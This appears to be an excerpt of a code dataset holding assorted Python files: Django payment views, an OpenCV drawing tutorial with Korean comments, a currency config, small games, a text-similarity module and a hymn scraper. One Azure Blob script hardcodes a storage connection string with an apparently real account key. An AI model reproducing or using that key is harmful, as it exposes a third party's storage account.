Transaction.objects.get(id=response['ORDERID'])\n txn_object.txn_id=response['TXNID']\n txn_object.amount=response['TXNAMOUNT']\n txn_object.status=response['STATUS']\n txn_object.payment_method='paytm'\n txn_object.date = str(datetime.now(tz.utc))\n txn_object.save()\n return HttpResponse({\"message\": \"Transaction Sucessful\"}, status=200)\n except ObjectDoesNotExist as e:\n return HttpResponse({\"message\":\"Transaction Was Not Initiated\"}, status=200)\n else:\n return HttpResponse({\"message\":\"Transaction Failed\"}, status=400)\n\ndef process_payment(request):\n order = Checksum.__id_generator__()\n # order = get_object_or_404(Order, id=order_id)\n host = request.get_host()\n\n paypal_dict = {\n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '',\n 'item_name': 'Order {}'.format(order),\n 'invoice': str(order),\n 'currency_code': 'INR',\n 'notify_url': 'http://{}{}'.format(host,\n reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host,\n reverse('payment_done')),\n 'cancel_return': 'http://{}{}'.format(host,\n reverse('payment_cancelled')),\n }\n\n form = PayPalPaymentsForm(initial=paypal_dict)\n return render(request, 'paypal.html', {'order': order, 'form': form})\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'paypal_sucess.html')\n\n\n@csrf_exempt\ndef payment_canceled(request):\n return render(request, 'paypal_failure.html')","sub_path":"pg-server/pgserver/pgserver/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"526267211","text":"from channels.auth import AuthMiddlewareStack # used to popuplate authenticated users info to scope of django channels (similar to django request)\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nimport chat.routing\n\napplication = ProtocolTypeRouter({\n # (http->django views is added by default)\n 'websocket': AuthMiddlewareStack(\n URLRouter(\n chat.routing.websocket_urlpatterns\n )\n ),\n})","sub_path":"django_chat/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46297564","text":"# 도형 그리기 : 영상이나 이미지 위에 그래픽을 그려 검출 결과를 시각적으로 표시함.\n# 선형 타입(Line Types) : 도형을 그릴 때 어떤 유형의 선으로 그릴지 결정.\n# 비트 쉬프트(bit Shift) : 서브 픽셀(Sub Pixel) 정렬을 지원해서 소수점 이하 자릿수를 표현 가능.\n\n# Import Library\nimport cv2\nimport numpy as np\n\n# 그림판 만들기\nsrc = np.zeros((768, 1366, 3), dtype=np.uint8)\n\n\"\"\"직선 그리기 함수(cv2.line)\ncv2.line(src, pt1, pt2, color, thickness, lineType, shift)\n: 입력 이미지(src)에 시작 좌표(pt1)부터 도착 좌표(pt2)를 지나는 특정 색상(color)과 두께(thinkness)의 직선을 그림.\"\"\"\nsrc = cv2.line(src, (100, 100), (1200, 100), (0, 0, 255), 3, cv2.LINE_AA)\n\n\"\"\"원 그리기 함수(cv2.circle)\ncv2.circle(src, center, radius, color, thickness, lineType, shift)\n: 입력 이미지(src)에 중심점(center)으로부터 반지름(radius) 크기의 특정 색상(color)과 두께(thickness)의 원을 그림.\"\"\"\nsrc = cv2.circle(src, (300, 300), 50, (0, 255, 0), cv2.FILLED, cv2.LINE_4)\n\n\"\"\"사각형 그리기 함수(cv2.rectangle)\ncv2.rectangle(src, pt1, pt2, color, thickness, lineType, shift)\n입력 이미지(src)에 좌측 상단 모서리 좌표(pt1)부터 우측 하단 모서리 좌표(pt2)로 \n구성된 특정 색상(color), 두께(thickness)의 사각형을 그림.\"\"\"\nsrc = cv2.rectangle(src, (500, 200), (1000, 400), (255, 0, 0), 5, cv2.LINE_8)\n\n\"\"\"호 그리기 함수(cv2.ellipse)\ncv2.ellipse(src, center, axes, angle, startAngle, endAngle, color, lineType, shift)\n: 입력 이미지(src)에 중심점(center)으로부터 장축과 단축(axes) 크기를 갖는 \n특정 색상(color)과 
두께(thickness)의 호를 그림.\"\"\"\nsrc = cv2.ellipse(src, (1200, 300), (100, 50), 0, 90, 180, (255, 255, 0), 2)\n\n# poly 함수를 사용하는 경우, numpy 형태로 저장된 위치 좌표들이 필요함.\n# n개의 점이 저장된 경우, n각형을 그릴 수 있음.\npst1 = np.array([[100, 500], [300, 500], [200, 600]])\npts2 = np.array([[600, 500], [800, 500], [700, 600]])\n\n\"\"\"내부가 채워지지 않은 다각형 그리기 함수(cv2.polylines)\ncv2.ellipse(src, pts, isClosed, color, thickness, lineType, shift)\n: 입력 이미지(src)에 선들의 묶음(pts)이 이뤄진 N개의 내구가 채워지지 않은 다각형을 그림.\n닫힘여부(isClosed)를 설정해 처음 좌표와 마지막 좌표의 연결 여부를 설정하며, \n설정한 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.polylines(src, [pst1], True, (0, 255, 255), 2)\n\n\"\"\"내부가 채워진 다각형 그리기 함수(cv2.fillPoly)\ncv2.ellipse(src, pts, color, thickness, lineType, shift, offset)\n: 입력 이미지(src)에 선들의 묶음(pts)이 이뤄진 N개의 내부가 채워지지 않은 다각형을 그림.\n설정한 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.fillPoly(src, [pts2], (255, 0, 255), cv2.LINE_AA)\n\n\"\"\"문자 그리기 함수(cv2.putText)\ncv2.putText(src, text, org, fontFace, fontScale, color, thickness, lineType, bottomLeftOrigin)\n: 입력 이미지(src)에 문자열(text)을 텍스트 박스의 좌측 상단 모서리(org)를 기준으로 문자가 그려짐.\n설정한 글꼴(fontFace)과 글자크기(fontScale), 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.putText(src, \"LeeJaeHa\", (900, 600), cv2.FONT_HERSHEY_COMPLEX, 2, (255, 255, 255), 3)\n\n\"\"\" 선형 타입 종류\ncv2.FILLED\t내부 채우기\ncv2.LINE_4\t4점 이웃 연결\ncv2.LINE_8\t8점 이웃 연결\ncv2.LINE_AA\tAntiAlias\n\"\"\"\n\n\"\"\" 글꼴 종류\ncv2.FONT_HERSHEY_SIMPLEX \t보통 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_PLAIN 작은 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_DUPLEX 보통 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_COMPLEX\t 보통 크기의 세리프 글꼴\ncv2.FONT_HERSHEY_TRIPLEX\t 보통 크기의 세리프 글꼴\ncv2.FONT_HERSHEY_COMPLEX_SMALL\t작은 크기의 손글씨\ncv2.FONT_HERSHEY_SCRIPT_SIMPLEX\t보통 크기의 손글씨\ncv2.FONT_HERSHEY_SCRIPT_COMPLEX\t보통 크기의 손글씨\ncv2.FONT_ITALIC\t 기울임 꼴\n\"\"\"\n\n# 이미지 출력 함수\ncv2.imshow(\"src\", src)\n# 키 입력 대기 함수\ncv2.waitKey()\n# 모든 윈도우 창 제거 함수\ncv2.destroyAllWindows()","sub_path":"17. 도형 그리기.py","file_name":"17. 
도형 그리기.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151494491","text":"from sqlalchemy import *\n\n\ndb = create_engine('sqlite:///../colleges.db')\n\ndb.echo = False\n\nmetadata = MetaData(db)\n\ncolleges = Table('universities', metadata, autoload=True)\n\ni = colleges.insert()\n\n\n\nwith open('../pdfs.txt', 'r') as file:\n for line in file:\n name = line\n url = next(file)\n i.execute(name=name, url=url)\n","sub_path":"scripts/databasepopulator.py","file_name":"databasepopulator.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"427145712","text":"from strconv.currates.currdsl import Currency, InEnglish, InRussian\nfrom strconv.currates.types import DataSource\nfrom strconv.currates.extractors import field, iso_date, timestamp_date\n\n__EXCHANGE_RATE_API_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXX\"\n__COINMARKETCAP_API_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXX\"\n\n_COINMARKETCAP_LIMIT = 1200\n\nUPDATE_VOLATILE_PERIOD_IN_HOURS = 1\n\nEXCHANGE_RATE_SOURCES = [\n DataSource('api.exchangerate.host', \"https://api.exchangerate.host/latest?base=USD\",\n field('success'), field('rates'), iso_date('date')),\n DataSource('exchangerate-api.com', f\"https://v6.exchangerate-api.com/v6/{__EXCHANGE_RATE_API_KEY}/latest/USD\",\n field('result'), field('conversion_rates'), timestamp_date('time_last_update_unix')),\n DataSource('coinmarketcap.com',\n f\"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit={_COINMARKETCAP_LIMIT}&convert=USD\",\n status_checker=lambda json: json['status']['error_code'] == 0,\n rates_extractor=lambda json: {x['symbol']:(1/x['quote']['USD']['price']) for x in json['data']},\n date_extractor=iso_date('status.timestamp'),\n headers={'X-CMC_PRO_API_KEY': __COINMARKETCAP_API_KEY},\n volatile=True),\n]\n\nCURRENCIES_MAPPING = [\n Currency('RUB', 'RUR', 'rur', '₽', 'руб.', 'руб', 'р.', 'р', words=[\n InEnglish('ruble'), InRussian('рубл', ('ь', 'я', 'ей'))\n ]),\n Currency('USD', '$', words=[\n InEnglish('dollar'), InRussian('доллар', ('', 'а', 'ов'))\n ]),\n Currency('EUR', '€', words=[\n InEnglish('euro'), InRussian('евро')\n ]),\n Currency('BTC', '₿', words=[\n InEnglish('bitcoin'), InRussian('биткоин', ('', 'а', 'ов'))\n ]),\n Currency('INR', '₹', '₨', 'Rs', 'Rp'),\n Currency('GBP', '£'),\n Currency('ILS', '₪'),\n]\n","sub_path":"examples/currates_conf.py","file_name":"currates_conf.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"289113442","text":"import os\nimport string\nimport json\nimport uuid\nimport avro.schema\n\nfrom azure.storage.blob import ContainerClient, BlobClient\nfrom avro.datafile import DataFileReader, DataFileWriter\nfrom avro.io import DatumReader, DatumWriter\n\nSTORAGE_CONNECTION_STRING = \"DefaultEndpointsProtocol=https;AccountName=storageskeventhub;AccountKey=eMvbcSlRl9DnZITSOmrpMUnMBUyQ3m18XJdT1sHfqjSYjcMjdz4NiSKBvbOLcas9PYyUUicGm9j3jEX3w38c4Q==;EndpointSuffix=core.windows.net\"\nSTORAGE_CONTAINER_NAME = \"containereventhub\"\n\n\n\ndef processBlob2(filename):\n reader = DataFileReader(open(filename, 'rb'), DatumReader())\n dict = {}\n \n for reading in reader:\n parsed_json = json.loads(reading[\"Body\"])\n if not 'id' in parsed_json:\n return\n if not parsed_json['id'] in dict:\n list = []\n dict[parsed_json['id']] = list\n else:\n list = 
dict[parsed_json['id']]\n list.append(parsed_json)\n reader.close()\n for device in dict.keys():\n filename = os.getcwd() + '\\\\' + str(device) + '.csv'\n deviceFile = open(filename, \"a\")\n for r in dict[device]:\n deviceFile.write(\", \".join([str(r[x]) for x in r.keys()])+'\\n')\n\ndef startProcessing():\n print('Processor started using path: ' + os.getcwd())\n # Create a blob container client.\n container = ContainerClient.from_connection_string(STORAGE_CONNECTION_STRING, container_name=STORAGE_CONTAINER_NAME)\n blob_list = container.list_blobs() # List all the blobs in the container.\n for blob in blob_list:\n # Content_length == 508 is an empty file, so process only content_length > 508 (skip empty files). \n if blob.size > 508:\n print('Downloaded a non empty blob: ' + blob.name)\n # Create a blob client for the blob.\n blob_client = ContainerClient.get_blob_client(container, blob=blob.name)\n # Construct a file name based on the blob name.\n cleanName = str.replace(blob.name, '/', '_')\n cleanName = os.getcwd() + '\\\\' + cleanName \n with open(cleanName, \"wb+\") as my_file: # Open the file to write. Create it if it doesn't exist. \n my_file.write(blob_client.download_blob().readall()) # Write blob contents into the file.\n try:\n processBlob2(cleanName) # Convert the file into a CSV file.\n except:\n print('test')\n os.remove(cleanName) # Remove the original downloaded file.\n # Delete the blob from the container after it's read.\n container.delete_blob(blob.name)\n\nstartProcessing()","sub_path":"EventHub/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155188778","text":"\nimport random\n\ndef guessWhat(a):\n randomNum = random.randint(0,20)\n print(\"Random Number ============>>>>> \" ,randomNum)\n if int(a) > randomNum :\n return True\n else:\n return False\n\n# Gawi : 0 / Bawi: 1 / Bo : 2 \ndef drawBet(a):\n randomNum = random.randint(0,2)\n #print(\"random ========>>>\",randomNum,a)\n print(\"알파고 선택은: \",drawBetDescription(randomNum))\n if a == 0 :\n if randomNum == 0:\n return \"E\"\n elif randomNum == 1:\n return \"L\"\n else:\n return \"W\"\n elif a == 1:\n if randomNum == 0:\n return \"W\"\n elif randomNum == 1:\n return \"E\"\n else:\n return \"L\"\n elif a == 2 :\n if randomNum == 0:\n return \"L\"\n elif randomNum == 1:\n return \"W\"\n else:\n return \"E\"\n\ndef drawBetDescription (drawNum):\n if drawNum == 0:\n return \"가위\"\n elif drawNum == 1:\n return \"바위\"\n elif drawNum == 2:\n return \"보\"","sub_path":"guessGame/guessDef.py","file_name":"guessDef.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"640683642","text":"# 문제\n# 수빈이는 동생과 숨바꼭질을 하고 있다. 수빈이는 현재 점 N(0 ≤ N ≤ 100,000)에 있고, 동생은 점 K(0 ≤ K ≤ 100,000)에 있다. 수빈이는 걷거나 순간이동을 할 수 있다. 만약, 수빈이의 위치가 X일 때 걷는다면 1초 후에 X-1 또는 X+1로 이동하게 된다. 순간이동을 하는 경우에는 1초 후에 2*X의 위치로 이동하게 된다.\n#\n# 수빈이와 동생의 위치가 주어졌을 때, 수빈이가 동생을 찾을 수 있는 가장 빠른 시간이 몇 초 후인지 구하는 프로그램을 작성하시오.\n#\n# 입력\n# 첫 번째 줄에 수빈이가 있는 위치 N과 동생이 있는 위치 K가 주어진다. 
N과 K는 정수이다.\n#\n# 출력\n# 수빈이가 동생을 찾는 가장 빠른 시간을 출력한다.\nfrom collections import deque\n\nlimit = 200001\nn, k = map(int, input().split())\nlocation = [-1]*limit\nq = deque()\nq.append(n)\nlocation[n] = 0\ndx = [-1,1,2]\n\nflag = True\nwhile (q and flag):\n v = q.popleft()\n\n for i in range(3):\n if dx[i]==2:\n nx = 2*v\n else:\n nx = v + dx[i]\n if 0<=nx\n print(c + d)\nTypeError: unsupported operand type(s) for +: 'int' and 'str'\n\"\"\"\n\n","sub_path":"day1/exercise_2_7.py","file_name":"exercise_2_7.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"514260886","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom UMBC_EVENT_KEYWORD_SIMILARITY import read_event_list\nimport pandas as pd\nimport numpy as np\n\ndef create_document_similarity_matrix(document_list):\n\n tfidf = TfidfVectorizer().fit_transform(document_list)\n # no need to normalize, since Vectorizer will return normalized tf-idf\n return tfidf * tfidf.T\n\n\ndef top_n_similar_event(document_similarity_matrix, events_ids, event_index,n):\n event_list_df = pd.DataFrame(np.zeros((len(events_ids), 2)),\n columns=['events_id', 'weight'])\n event_list_df['events_id'] = event_list_df['events_id'].astype(str)\n\n\n for i in range(len(events_ids)):\n if i!=event_index:\n event_list_df.set_value(i, 'events_id', events_ids[i], takeable=False)\n event_list_df.set_value(i, 'weight', document_similarity_matrix[event_index,i], takeable=False)\n\n sorted_list = event_list_df.sort_values(by='weight', ascending=0)\n\n if len(events_ids) <= n:\n return sorted_list\n else:\n return sorted_list.head(n)\n\ndef get_top_similar_events(db_name,top_n_similar,total_needed_by_sim,selected_ids_before):\n event_list = read_event_list(db_name)\n event_list_processed_ids = []\n event_list_processed_desc = []\n\n for event in event_list:\n event_list_processed_ids.append(event['events_id'])\n event_list_processed_desc.append(event['evtdesc'])\n\n document_similarity_matrix = create_document_similarity_matrix(event_list_processed_desc)\n flag = 0\n for id in selected_ids_before:\n if flag==0:\n top_list=(top_n_similar_event(document_similarity_matrix, event_list_processed_ids, event_list_processed_ids.index(id), top_n_similar))\n flag=1\n else:\n top_list.append(top_n_similar_event(document_similarity_matrix, event_list_processed_ids,\n event_list_processed_ids.index(id), top_n_similar))\n\n sorted_list = top_list.sort_values(by='weight', ascending=0)\n\n counter = 0\n selected_ids_sofar = list(selected_ids_before)\n #print \"start\"\n #print selected_ids_sofar\n #print \"end\"\n #return 0\n for i in range(len(sorted_list.index)):\n if counter == total_needed_by_sim:\n break\n\n eventid = sorted_list.get_value(sorted_list.index[i], 'events_id')\n #print \"test:\"+eventid\n if not(eventid in selected_ids_sofar):\n counter +=1\n selected_ids_sofar.append(eventid)\n\n return selected_ids_sofar\n\n\n\n","sub_path":"document_similarity.py","file_name":"document_similarity.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468481467","text":"from random import random, randint, choice\n\n\nclass Player:\n \"\"\"Класс игрока\n\n \"\"\"\n\n def __init__(self, name):\n self.name = name # имя игрока\n self.hp = 100 # жизни игрока\n self.low_hit = randint(18, 25) # урон в небольшом диапазоне\n self.high_hit = randint(10, 35) # урон в большом диапазоне\n 
self.heal = randint(18, 25) # лечение в небольшом диапазоне\n\n def make_low_hit(self, enemy):\n \"\"\"Функция для нанесения умеренного урона с небольшим диапозоном \n\n \"\"\"\n print(f'\\n*** {self.name}, Ваш урон в небольшом диапазоне (18-25) равен: {self.low_hit}dmg\\n')\n\n enemy.hp -= self.low_hit\n if enemy.hp < 0: # нижняя граница жизней\n enemy.hp = 0\n print(f'--> {self.name} нанёс {enemy.name}u -{self.low_hit}dmg!')\n\n print(f'\\n*** {enemy.name} HP(♥): {enemy.hp}hp')\n print(f'*** {self.name} HP(♥): {self.hp}hp')\n\n def make_high_hit(self, enemy):\n \"\"\"Функция для нанесения урона с большим диапозоном\n\n \"\"\"\n print(f'\\n*** {self.name}, Ваш урон в большом диапазоне (10-35) равен: {self.high_hit}dmg\\n')\n\n enemy.hp -= self.high_hit\n if enemy.hp < 0: # нижняя граница жизней\n enemy.hp = 0\n print(f'--> {self.name} нанёс {enemy.name}u -{self.high_hit}dmg!')\n\n print(f'\\n*** {enemy.name} HP(♥): {enemy.hp}hp')\n print(f'*** {self.name} HP(♥): {self.hp}hp')\n\n def make_heal(self):\n \"\"\"Функция для исцеления в небольшом диапазоне\n\n \"\"\"\n print(f'\\n*** {self.name} решил исцелить себя на +{self.heal}hp!')\n print(f'*** {self.name}, на данный момент Ваше здоровье: {self.hp}hp')\n\n self.hp += self.heal\n if self.hp > 100: # верхняя граница полных жизней\n self.hp = 100\n print(f'\\n--> {self.name} исцелил себя на {self.heal}hp!')\n\n print(f'\\n*** {self.name} HP(♥): {self.hp}hp')\n return self.hp\n\n def make_act(self, enemy):\n \"\"\"Функция для выбора атаки\n\n \"\"\"\n self.act = [self.make_low_hit, self.make_high_hit]\n r_choice = choice(self.act)(enemy) # рандомный выбор атаки\n return r_choice\n\n\ndef new_game(pl_1, pl_2):\n \"\"\"Функция алгоритма работы игры\n\n \"\"\"\n count = 1\n print('\\n' + '*' * 33)\n print('*** START GAME! ***')\n print('8' * 33 +'\\n')\n print(f'*** ИГРОК №1: {pl_1.name}')\n print(f'*** ИГРОК №2: {pl_2.name}\\n')\n\n while pl_1.hp > 0 and pl_2.hp > 0:\n r_turn = random() # рандомное число для определения игрока, который будет делать ход\n r_heal = random() # рандомное число для выполнения функции лечения\n print('-' * 33)\n print(f'- ДЕЙСТВИЕ №{count} -')\n print('-' * 33)\n if r_turn > 0.5:\n print(f'*** Сейчас ход {pl_1.name}a!'.upper())\n if r_heal > 0.5:\n pl_1.make_act(pl_2)\n elif r_heal < 0.5 and pl_1.hp < 35:\n if r_heal > 0.11:\n pl_1.make_heal()\n else:\n pl_1.make_act(pl_2)\n else:\n pl_1.make_heal()\n else:\n print(f'*** Сейчас ход {pl_2.name}a!'.upper())\n if r_heal < 0.5:\n pl_2.make_act(pl_1)\n else:\n pl_2.make_heal()\n print('-' * 72 + '\\n')\n count += 1\n else:\n if pl_1.hp <= 0:\n print(f'\\n† † † {pl_1.name} DEAD! † † † \\n\\n░░░░░ {pl_2.name} WIN! CONGRATULATION!!! ░░░░░'.upper())\n elif pl_2.hp <= 0:\n print(f'\\n† † † {pl_2.name} DEAD! † † † \\n\\n░░░░░ {pl_1.name} WIN! CONGRATULATION!!! ░░░░░'.upper())\n print('\\n' + '*' * 33)\n print('*** GAME OVER! 
***')\n print('*' * 33)\n\ncomputer = Player(\"Botnet\") # инстанс класса\nhuman = Player(\"WhiteHatHacker\") # инстанс класса\n\nnew_game(computer, human) # вызов функции новой игры\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"43990269","text":"'''\r\nSDA2OpenLyrics_extractor2.py\r\nThis program reads a list of link in a seperate file (sda_hymnals_list.txt),\r\nopens the source, reads the title of hymn and the lyrics, reads the theme/topic\r\nof the songs and outputs the result to an xml file with the openlyrics format\r\nver. 0.8\r\n\r\nIts only purpose is for the SDA church use, and nowhere else.\r\n\r\nauthor: Arnold Chand\r\ndate Modified: 03/24/2016\r\n'''\r\nimport re\r\nimport urllib.request as request\r\nfrom bs4 import BeautifulSoup\r\nimport authors as sda\r\n\r\nOUTPUT_FILE_DIR = \"hymnals/adventisthymns_com/\"\r\nTEMPLATE_FILE = \"openlyrics_template.xml\"\r\nLIST_FILE = \"adventishymnscom_list.txt\"\r\n\r\nVERSE_FORMAT = \"{1}\\n\"\r\n\r\nCOPYRIGHT_FORMAT = \"{0}\"\r\n\r\nAUTHOR_FORMAT = \"{0}\"\r\n\r\nESCAPE_CHARS = {\r\n \"dash\": b'\\xe2\\x80\\x93'.decode(),\r\n \"dash2\": b\"\\xe2\\x80\\x94\".decode(),\r\n \"quote\": b'\\xe2\\x80\\x99'.decode(),\r\n \"double-quote\": b'\\xe2\\x80\\x98'.decode(),\r\n \"double-quote-open\": b\"\\xe2\\x80\\x9c\".decode(),\r\n \"double-quote-close\": b\"\\xe2\\x80\\x9d\".decode(),\r\n \"space\": b\"\\xc2\\x9d\".decode(),\r\n \"unknown2\": b\"\\x0b\".decode(),\r\n \"copyright\": b\"\\xc2\\xa9\".decode()\r\n}\r\n\r\ndef get_lyrics(soup_obj):\r\n \"\"\"Gets the lyrics through the website, parses the string\r\n in an XML format and returns that as (string).\r\n \"\"\"\r\n verse_names = []\r\n verse_lines = []\r\n verse_lines_str = \"\"\r\n verses_string = \"\"\r\n\r\n lyrics = soup_obj.find(\"div\", class_=\"lyrics\")\r\n\r\n lyric_titles = lyrics.find_all(\"h2\")\r\n lyric_contents = lyrics.find_all(\"p\")\r\n\r\n for lyric_title in lyric_titles:\r\n if str(lyric_title).find(\"Verse\") != -1:\r\n verse_names.append(lyric_title.string.lower()[0] +\\\r\n lyric_title.string.lower()[6])\r\n\r\n if str(lyric_title).find(\"Refrain\") != -1:\r\n verse_names.append(\"c1\")\r\n\r\n for lyric_content in lyric_contents:\r\n verse_lines_str = str(lyric_content)\r\n verse_lines_str = verse_lines_str\\\r\n .replace(ESCAPE_CHARS[\"double-quote-open\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-close\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"quote\"], \"'\")\\\r\n .replace(ESCAPE_CHARS[\"dash\"], \"-\")\\\r\n .replace(ESCAPE_CHARS[\"dash2\"], \"-\")\\\r\n .replace(ESCAPE_CHARS[\"space\"], \" \")\\\r\n .replace(\":\", \";\")\\\r\n .replace(\"\\n\\n\", \"
\")\\\r\n .replace(\"

\", \"\")\\\r\n .replace(\"

\", \"\")\r\n\r\n verse_lines.append(verse_lines_str)\r\n\r\n for i in range(len(verse_names)):\r\n verses_string += VERSE_FORMAT.format(verse_names[i], verse_lines[i].replace(\"\\n\", \"\"))\r\n\r\n # DEBUG\r\n # print(verses_string)\r\n\r\n return verses_string\r\n\r\ndef get_hymn_title_num(url):\r\n \"\"\"Gets the hymn number and title through the url and parse it.\r\n Returns a (Dict).\r\n \"\"\"\r\n hymn_number = url[41:44]\r\n hymn_title = url[45:].replace(\"-\", \" \").title()\r\n\r\n return {\r\n \"number\": hymn_number,\r\n \"title\": hymn_title\r\n }\r\n\r\ndef get_author(soup_obj, hymn_number):\r\n \"\"\"Get the author name, if not found refer to authors.py.\r\n Returns a (string).\r\n \"\"\"\r\n author = sda.AUTHORS[hymn_number]\r\n return author\r\n\r\ndef get_theme(soup_obj):\r\n \"\"\"Gets the theme from the website, returns as (string)\"\"\"\r\n theme = soup_obj.find(\"dd\", class_=\"hymn-topic\")\r\n\r\n if theme == None:\r\n print(\"No theme found.\")\r\n return \"\"\r\n else:\r\n return theme.a.string.strip()\r\n\r\ndef get_copyright_info(soup_obj):\r\n \"\"\"Gets the copyright info from the website, if no copyright is found then\r\n return an empty (string) else return the info as (string)\"\"\"\r\n copyright = soup_obj.find(\"dd\", class_=\"hymn-copyright\")\r\n\r\n if copyright == None:\r\n print(\"No copyright found.\")\r\n return \"\"\r\n else:\r\n copyright = copyright.p.text\r\n copyright = copyright\\\r\n .replace(\"&\", \"&\")\\\r\n .replace(\"\\n\", \"\")\\\r\n .replace(ESCAPE_CHARS[\"a\"], 'a')\\\r\n .replace(ESCAPE_CHARS[\"copyright\"], \"(c)\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-open\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote-close\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"double-quote\"], \""\")\\\r\n .replace(ESCAPE_CHARS[\"quote\"], \"'\")\\\r\n .replace(ESCAPE_CHARS[\"dash\"], '-')\\\r\n .replace(ESCAPE_CHARS[\"dash2\"], '-')\\\r\n .replace(ESCAPE_CHARS[\"space\"], ' ')\r\n\r\n print(\"COPYRIGHT WARNING!\")\r\n return copyright\r\n\r\ndef main():\r\n \"\"\"Read the URL list, get source code from URL, call functions to get the\r\n hymn number, title, theme, author, copyright info, and verses.\r\n\r\n Read the template file, replace with .format(), create a new file with\r\n the hymn number as the file name, write string to the new XML file.\r\n\r\n Repeat 695 times, the number of hymns. 
End by closing the URL list.\r\n Terminate the program.\r\n \"\"\"\r\n # Request URL\r\n print(\"Reading from the LIST FILE: \\'{0}\\'\".format(LIST_FILE))\r\n list_file = open(LIST_FILE, 'r')\r\n\r\n # Loop for url available in list file\r\n for line in list_file:\r\n\r\n # DEBUG\r\n # for l in range(1):\r\n # DEBUG\r\n # url = list_file.readline().replace(\"\\n\", \"\")\r\n\r\n url = line.replace(\"\\n\", \"\")\r\n\r\n # Parse the file to source code\r\n print(\"Retriving data from: \\'{0}\\'\".format(url))\r\n source = request.urlopen(url)\r\n source_code = source.read()\r\n soup = BeautifulSoup(source_code, \"html.parser\")\r\n print(\"Retrived data.\")\r\n\r\n # Title of the Hymnal\r\n print(\"Searching for Title.\")\r\n hymn = get_hymn_title_num(url)\r\n print(\"Hymnal Title: \\'{0} - {1}\\'\".format(hymn[\"number\"],\\\r\n hymn[\"title\"]))\r\n\r\n # Author HUNT!!\r\n print(\"Searching for author.\")\r\n author = get_author(soup, hymn[\"number\"])\r\n print(\"Author: \\'{0}\\'\".format(author))\r\n author = AUTHOR_FORMAT.format(author)\r\n\r\n # DEBUG\r\n # print(author)\r\n\r\n # Theme of the hymnal\r\n print(\"Searching the theme.\")\r\n theme = get_theme(soup)\r\n print(\"Theme: \\'{0}\\'\".format(theme))\r\n\r\n # Copyright search\r\n print(\"Searching for copyright info.\")\r\n copyright = get_copyright_info(soup)\r\n if copyright != \"\":\r\n copyright = COPYRIGHT_FORMAT.format(copyright)\r\n\r\n # DEBUG\r\n # print(\"\\'{0}\\'\".format(copyright))\r\n\r\n # Lyrics of the Hymnal\r\n print(\"Parsing Lyrics...\")\r\n hymn_verses = get_lyrics(soup)\r\n\r\n # DEBUG\r\n # print(hymn_verses)\r\n\r\n print(\"Parsed.\")\r\n\r\n print(\"Opening TEMPLATE FILE: \\'{0}\\'\".format(TEMPLATE_FILE))\r\n openlyrics_template = open(TEMPLATE_FILE, 'r')\r\n xml_content = openlyrics_template.read()\r\n\r\n print(\"Closing the TEMPLATE FILE.\")\r\n openlyrics_template.close()\r\n # {0} -> hymn[\"number\"]\r\n # {1} -> hymn[\"title\"]\r\n # {2} -> copyright\r\n # {3} -> author\r\n # {4} -> theme\r\n # {5} -> hymn_verses\r\n xml_content = xml_content.format(hymn[\"number\"], hymn[\"title\"], copyright,\\\r\n author, theme, hymn_verses)\r\n\r\n print(\"Creating NEW FILE: \\'\" + hymn[\"number\"] + \".xml\\'\")\r\n new_xml_file = open(OUTPUT_FILE_DIR + hymn[\"number\"] + \".xml\", 'w')\r\n new_xml_file.write(xml_content)\r\n\r\n print(\"SUCCESSFUL WRITE: \\'\" + hymn[\"number\"] + \".xml\\'\")\r\n\r\n print(\"Closing NEW FILE.\")\r\n new_xml_file.close()\r\n\r\n print(\"Closing LIST FILE.\")\r\n list_file.close()\r\n\r\n print(\"SUCCESSFULLY CLOSED. ENDING PROGRAM.\")\r\n\r\nif __name__ == \"__main__\":\r\n 